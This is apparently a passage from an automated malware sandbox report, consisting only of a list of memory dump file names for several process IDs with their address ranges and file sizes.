                                                                                                                    • memory/4972-203-0x000002BC9A4C0000-0x000002BC9A4C2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4972-204-0x000002BC9A4C0000-0x000002BC9A4C2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4972-205-0x000002BCB65B0000-0x000002BCB65B1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4972-207-0x000002BC9C130000-0x000002BC9C132000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4972-208-0x000002BC9C133000-0x000002BC9C135000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/4972-210-0x000002BC9A4C0000-0x000002BC9A4C2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                    • memory/5028-854-0x000000007F9A0000-0x000000007F9A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5028-796-0x0000000006970000-0x0000000006971000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5028-788-0x0000000000000000-mapping.dmp

                                                                                                                    • memory/5028-798-0x0000000006972000-0x0000000006973000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/5068-239-0x000000000041B25E-mapping.dmp

                                                                                                                    • memory/5068-262-0x0000000004D50000-0x0000000005356000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      6.0MB